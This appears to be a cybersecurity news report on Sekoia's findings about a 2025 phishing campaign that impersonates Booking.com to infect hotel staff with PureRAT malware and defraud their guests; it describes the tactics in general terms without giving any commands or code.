Massive Phishing Campaign Targets Hospitality Industry with PureRAT

Cybersecurity researchers have identified a large-scale phishing campaign targeting the hospitality sector, specifically hotels, with the deployment of PureRAT malware. This campaign utilizes compromised email accounts to send spear-phishing emails that impersonate Booking.com, leading hotel managers to malicious ClickFix-style pages designed to harvest their credentials.

According to Sekoia, the attackers craft emails that redirect victims to fake websites, employing tactics that utilize a reCAPTCHA challenge to appear legitimate. Once on these pages, users are tricked into executing a malicious PowerShell command that downloads a ZIP file containing PureRAT, a modular malware that provides wide-ranging capabilities, including remote access and keylogging.

The threat actors aim to gain unauthorized access to booking platforms like Booking.com and Expedia, allowing them to sell stolen credentials or execute fraudulent schemes against hotel customers. The campaign has reportedly been active since at least April 2025, with operational activities continuing into October 2025.

Sekoia notes that the attackers are sourcing information about hotel administrators from cybercrime forums and are even offering payments based on the profits derived from these compromised accounts. They also employ traffers, specialists dedicated to malware distribution, to automate their efforts.

Furthermore, the campaign has expanded to contact hotel customers directly via WhatsApp or email, instructing them to click on links for verification purposes, which leads them to sites that mimic Booking.com or Expedia to steal banking information.

The data harvested from these phishing attacks is a lucrative commodity, often sold in illicit markets. Reports indicate that attackers have created Telegram bots to facilitate the purchase of Booking.com logs, with services offering to verify the authenticity of compromised accounts.

The ClickFix tactic has evolved, now integrating embedded videos and real-time counters to increase the perceived legitimacy of their fraudulent pages. These evolving tactics make it increasingly difficult for users to discern legitimate requests from malicious ones, raising significant concerns about the cybersecurity posture of the hospitality industry.

As the threat landscape continues to adapt, experts urge the hospitality sector to strengthen their cybersecurity measures to protect sensitive data from such sophisticated phishing attacks.